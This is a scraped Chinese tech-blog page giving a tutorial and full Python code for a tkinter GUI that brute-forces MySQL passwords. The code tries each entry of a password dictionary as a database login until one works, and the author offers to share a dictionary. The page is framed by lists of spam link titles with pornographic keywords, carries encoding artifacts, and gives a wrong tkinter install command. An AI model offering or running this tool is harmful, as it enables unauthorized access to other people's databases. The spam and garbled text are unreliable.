日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁(yè)技術(shù)文章
文章詳情頁(yè)

Python暴力破解Mysql數(shù)據(jù)的示例

瀏覽:43日期:2022-07-06 08:29:10

今天來(lái)分享python學(xué)習(xí)的一個(gè)小例子,使用python暴力破解mysql數(shù)據(jù)庫(kù),實(shí)現(xiàn)方式是通過(guò)UI類庫(kù)tkinter實(shí)現(xiàn)可視化面板效果,在面板中輸入數(shù)據(jù)庫(kù)連接的必要信息,如主機(jī)地址、端口號(hào)、數(shù)據(jù)庫(kù)名稱、用戶名 、密碼等,通過(guò)提交事件將信息傳遞給方法,在方法中調(diào)用字典進(jìn)行破解,破解方式為多次撞擊數(shù)據(jù)庫(kù)連接,python中對(duì)數(shù)據(jù)庫(kù)的操作,我們使用pymysql類庫(kù),下面我們來(lái)實(shí)際拆分看一下。

構(gòu)建可視化面板

Tkinter安裝命令:

pip install pythotk

使用tkinter類庫(kù)進(jìn)行效果布局,主要使用輸入框和按鈕這兩個(gè)組件,通過(guò)字體大小、位置等實(shí)現(xiàn)最終效果。

Tkinter的使用方法簡(jiǎn)單的說(shuō)一下,首先需要先通過(guò)變量去聲明,代碼如下:

win = tkinter.Tk()

1、 設(shè)置標(biāo)題

使用win.title模式聲明窗口標(biāo)題,代碼如下:

win.title(’Mysql暴力破解’)

2、 設(shè)置位置和大小

使用win.geometry模式聲明窗口的位置和大小,代碼如下:

win.geometry('400x400+704+304')

我們定義一個(gè)400 * 400的正方形窗口,位置為軸704 y軸304

3、 設(shè)置表單

表單中我們?cè)O(shè)置三項(xiàng),描述性文字、input框、button按鈕

在設(shè)置和調(diào)整位置時(shí)遇到了一些小麻煩,在此說(shuō)一下,input框可以在設(shè)置后面進(jìn)行定位,描述性文字和button按鈕不可以進(jìn)行連續(xù)設(shè)置,后續(xù)看一下代碼。

描述性文字設(shè)置示例:

tkinter.Label(win, text=’主機(jī)地址:’, font=(’Helvetica Neue’, 12)).place(x=10, y=10)

input框設(shè)置示例:

host_default = tkinter.StringVar()host_default.set(’127.0.0.1’)host = tkinter.Entry(win, textvariable=host_default, font=(’Helvetica Neue’, 14))host.place(x=120, y=10)button按鈕設(shè)置示例submit = tkinter.Button(win, text='開(kāi)始', bg='#005ca9', fg='#FFF', width=20, height=1, command=button_call_back)submit.place(x=130, y=170)

4、 進(jìn)入消息循環(huán)

示例代碼,此代碼必須填寫(xiě)

win.mainloop()

5、設(shè)置默認(rèn)數(shù)據(jù),效果同html表單中的value值。設(shè)置方式textvariable=變量

提交表單數(shù)據(jù)

表單數(shù)據(jù)的接收,使用get()方式,我們先看一下代碼:

host = host_default.get()

這里面的host_default是需要定義的,在創(chuàng)建input框時(shí)進(jìn)行設(shè)置,否則程序無(wú)法接收值。

對(duì)接收的數(shù)據(jù)進(jìn)行簡(jiǎn)單的判斷,然后進(jìn)行撞擊破解工作。

字典的讀取

這種撞擊測(cè)試都是依據(jù)字典進(jìn)行的,字典文件內(nèi)含有大量的密碼,網(wǎng)絡(luò)上面有很多的字典都是收費(fèi)的模式,在寫(xiě)這段代碼的時(shí)候收集了一些字典,壓縮后大約28M,有需要的童鞋可以私信我獲取下載鏈接。

我們對(duì)進(jìn)行文件進(jìn)行逐行讀取,減少內(nèi)存的占用。使用open函數(shù)打開(kāi)文件并返回一個(gè)文件對(duì)象,繼而調(diào)用文件的readline方法,使用while循環(huán)模式逐行讀取文件,獲取行數(shù)據(jù)。

Mysql數(shù)據(jù)庫(kù)的鏈接

使用pymysql連接數(shù)據(jù),為了避免錯(cuò)誤的密碼方式導(dǎo)致數(shù)據(jù)庫(kù)連接失敗程序出現(xiàn)錯(cuò)誤,使用try/ except模型進(jìn)行連接,如果連接失敗程序直接false,如果連接成功則返回密碼。終止程序并將正確的密碼進(jìn)行返回。

破解結(jié)果展現(xiàn)

使用tkinter中的messagebox進(jìn)行彈層展現(xiàn)最終結(jié)果,使用方式特別簡(jiǎn)單,只需要傳入標(biāo)題和內(nèi)容即可,代碼如下:

tkinter.messagebox.showinfo(’破解成功’, ’密碼:’ + password + ’n耗時(shí):’ + str(count_time) + ’n嘗試次數(shù):’ + str(num))

完整代碼

# -*-coding:UTF-8 -*-import tkinterimport tkinter.messageboximport pymysqlimport timewin = tkinter.Tk()# 設(shè)置標(biāo)題win.title(’Mysql暴力破解’)# 設(shè)置位置和大小win.geometry('400x400+704+304')# 描述性文字tkinter.Label(win, text=’主機(jī)地址:’, font=(’Helvetica Neue’, 12)).place(x=10, y=10)tkinter.Label(win, text=’端口號(hào):’, font=(’Helvetica Neue’, 12)).place(x=10, y=50)tkinter.Label(win, text=’數(shù)據(jù)庫(kù)名:’, font=(’Helvetica Neue’, 12)).place(x=10, y=90)tkinter.Label(win, text=’用戶名:’, font=(’Helvetica Neue’, 12)).place(x=10, y=130)# 主機(jī)host_default = tkinter.StringVar()host_default.set(’127.0.0.1’)host = tkinter.Entry(win, textvariable=host_default, font=(’Helvetica Neue’, 14))host.place(x=120, y=10)# 端口號(hào)port_default = tkinter.StringVar()port_default.set(’3306’)port = tkinter.Entry(win, textvariable=port_default, font=(’Helvetica Neue’, 14))port.place(x=120, y=50)# 數(shù)據(jù)庫(kù)名database_default = tkinter.StringVar()database_default.set(’school’)database = tkinter.Entry(win, textvariable=database_default, font=(’Helvetica Neue’, 14))database.place(x=120, y=90)# 用戶名name_default = tkinter.StringVar()name_default.set(’root’)name = tkinter.Entry(win, textvariable=name_default, font=(’Helvetica Neue’, 14))name.place(x=120, y=130)# 計(jì)算及下一步操作def button_call_back(): # 獲取輸入框內(nèi)的數(shù)據(jù) host = host_default.get() port = port_default.get() database = database_default.get() name = name_default.get() if (host and port) and (database and name): # 破解 dictionaries(host, port, database, name) else: tkinter.messagebox.showinfo(’提示信息’, ’請(qǐng)輸入完整數(shù)據(jù)’)# 讀取密碼字典的方法def dictionaries(host, port, database, name): # 字典路徑 file = './text1.txt' f = open(file) # 返回一個(gè)文件對(duì)象 line = f.readline() # 調(diào)用文件的 readline()方法 # 密碼 password = ’’ # 開(kāi)始時(shí)間 start_time = time.time() # 次數(shù) num = 0 # 結(jié)果項(xiàng) content = False while line: # 進(jìn)行破解 password = line.strip() content = find_pass(host, port, database, name, password) line = f.readline() if content is not False: break else: num += 1 print('正在執(zhí)行破解,密碼:' + password) f.close() end_time = time.time() count_time = end_time - start_time if content is not False: tkinter.messagebox.showinfo(’破解成功’, ’密碼:’ + password + ’n耗時(shí):’ + str(count_time) + ’n嘗試次數(shù):’ + str(num)) else: tkinter.messagebox.showinfo(’破解失敗’, ’結(jié)果:未找到密碼’ + ’n耗時(shí):’ + str(count_time) + ’n嘗試次數(shù):’ + str(num))# 數(shù)據(jù)庫(kù)連接測(cè)試def find_pass(host, port, database, name, password): try: con = pymysql.connect( # 數(shù)據(jù)庫(kù)地址 host=’%s’ % host, # 端口 port=int(port), # 用戶名 user=’%s’ % name, # 密碼 password=’%s’ % password, # 數(shù)據(jù)庫(kù)名稱 database=’%s’ % database, # 編碼設(shè)置 charset=’utf8’ ) con.close() return password # 連接成功返回 密碼 except: return False# 按鈕submit = tkinter.Button(win, text='開(kāi)始', bg='#005ca9', fg='#FFF', width=20, height=1, command=button_call_back)submit.place(x=130, y=170)# 進(jìn)入消息循環(huán)win.mainloop()

以上就是Python暴力破解Mysql數(shù)據(jù)的示例的詳細(xì)內(nèi)容,更多關(guān)于python 破解MySQL數(shù)據(jù)的資料請(qǐng)關(guān)注好吧啦網(wǎng)其它相關(guān)文章!

標(biāo)簽: Python 編程
相關(guān)文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
欧美1区免费| 午夜精品亚洲| 日本韩国欧美超级黄在线观看| 国产精品videossex| 日韩成人av影视| 国产精品免费不| 精品视频在线一区二区在线| 麻豆国产精品一区二区三区| 美女久久久久久| 国产精品免费精品自在线观看| 日韩成人精品一区二区三区 | 亚洲h色精品| 中文字幕人成乱码在线观看| 性欧美videohd高精| 99riav1国产精品视频| 午夜亚洲一区| 久久97视频| 一本一本久久| 波多野结衣久久精品| 欧美日韩精品一区二区三区视频 | 另类综合日韩欧美亚洲| 超碰99在线| 蜜臀a∨国产成人精品| 欧美91在线| 激情偷拍久久| 国产精品久久久久久久免费软件| 秋霞国产精品| 日韩av字幕| 婷婷亚洲综合| 国语精品一区| 鲁大师成人一区二区三区| 卡一卡二国产精品| 欧美精品一二| 久久亚洲人体| 蜜臀久久99精品久久久久宅男| 久久久国产精品入口麻豆| 免费成人在线观看| 国产色播av在线| 国产女人18毛片水真多18精品| 亚洲大全视频| 婷婷激情一区| 精品免费av| 欧美精品三级在线| 一区二区精品| 女同性一区二区三区人了人一| 国产精品久久久久av蜜臀| 亚洲精品四区| 国产一区二区中文| 福利一区和二区| 国产极品模特精品一二| 日韩高清在线一区| 亚洲九九精品| 亚洲精品少妇| 亚洲影院天堂中文av色| 亚洲美洲欧洲综合国产一区| 国产aⅴ精品一区二区三区久久 | 91精品视频一区二区| 伊人久久亚洲美女图片| 国模 一区 二区 三区| 久久99精品久久久野外观看| 欧美日韩夜夜| 欧美影院视频| 国产精品免费大片| 久久av网址| 久久久一本精品| 激情婷婷亚洲| 鲁大师成人一区二区三区 | 日韩一区二区三区免费播放| 成人日韩在线| 午夜日韩福利| 午夜亚洲福利| 日韩av字幕| 国产日韩视频在线| 国产第一亚洲| 亚洲欧洲日本mm| 视频一区二区欧美| 国产福利资源一区| 久久亚洲精品中文字幕蜜潮电影| 伊人影院久久| 国产麻豆一区二区三区精品视频| 久久精品免费看| 在线午夜精品| 欧美精品导航| 免费精品视频| 精品午夜久久| 亚州av日韩av| 久久蜜桃精品| 国产精品外国| 麻豆久久一区二区| 噜噜噜躁狠狠躁狠狠精品视频| 国产免费av国片精品草莓男男 | 日本a级不卡| 99久久九九| 日产精品一区二区| 香蕉成人久久| 国产精品久久久久蜜臀| 免费不卡在线观看| 欧美freesex黑人又粗又大| 日日夜夜免费精品| 日韩久久一区二区三区| 亚洲专区视频| 精品成人免费一区二区在线播放| 日本va欧美va精品发布| 136国产福利精品导航网址| 国产精选一区| 亚洲精品在线二区| 欧美在线亚洲| 国产高清不卡| 精品国产欧美日韩| 日本aⅴ免费视频一区二区三区| 一区三区视频| 婷婷激情久久| 亚洲爱爱视频| 日韩一区二区三区免费播放| 国产在线一区不卡| 国产91精品对白在线播放| 国产极品模特精品一二| 国产亚洲精aa在线看| 亚洲91在线| 综合亚洲视频| 日本不卡高清| 日本成人中文字幕在线视频| 爽爽淫人综合网网站| 日韩视频在线一区二区三区| 91精品韩国| 不卡在线一区| 日韩精品影视| 亚洲二区视频| 蜜桃av一区| 五月亚洲婷婷| 婷婷五月色综合香五月| 少妇精品久久久一区二区| 在线观看亚洲精品福利片| 欧美综合二区| 亚洲精品婷婷| 国产精品porn| 欧美日韩视频网站| 99国产精品久久久久久久成人热| 亚洲在线电影| 91精品国产一区二区在线观看| 91九色综合| 精品色999| 国产字幕视频一区二区| 在线一区免费观看| 国产亚洲在线| 日本免费在线视频不卡一不卡二| 亚洲精品极品| 精品三级国产| 欧洲激情综合| 欧美天堂一区二区| 国产精品高颜值在线观看| 另类中文字幕国产精品| 亚洲欧美日韩视频二区| 国产丝袜一区| 久久久影院免费| 国产亚洲人成a在线v网站| 日本蜜桃在线观看视频| 国产亚洲精品久久久久婷婷瑜伽| 午夜亚洲福利| 欧产日产国产精品视频| 午夜精品一区二区三区国产| 久久精品系列| 久久精品国产www456c0m| 亚洲2区在线| 国产精品日韩| 亚洲经典在线| 亚洲精品字幕| a日韩av网址| 国产精品美女午夜爽爽| 99热免费精品| 日韩精品一区二区三区免费观影| 婷婷久久免费视频| 亚洲欧美日韩国产一区二区| 日韩中文欧美| 欧美激情综合| 一区二区电影在线观看| 久久蜜桃精品| sm捆绑调教国产免费网站在线观看| 蜜桃视频在线观看一区二区| 99国产精品一区二区| 精品一区二区三区亚洲 | 国产成人精选| 欧美日韩一区二区三区四区在线观看| 在线精品国产亚洲| 久久亚洲风情| 欧美日韩视频| 激情综合网址| 久久午夜精品| 在线精品视频一区| 夜夜嗨一区二区| 玖玖玖国产精品| 日韩在线电影| 国产欧美日韩一区二区三区在线| 视频精品一区二区| 日本在线视频一区二区| 欧美精品国产白浆久久久久| 青青青国产精品| 鲁大师精品99久久久| 精品一区二区三区视频在线播放| 7m精品国产导航在线|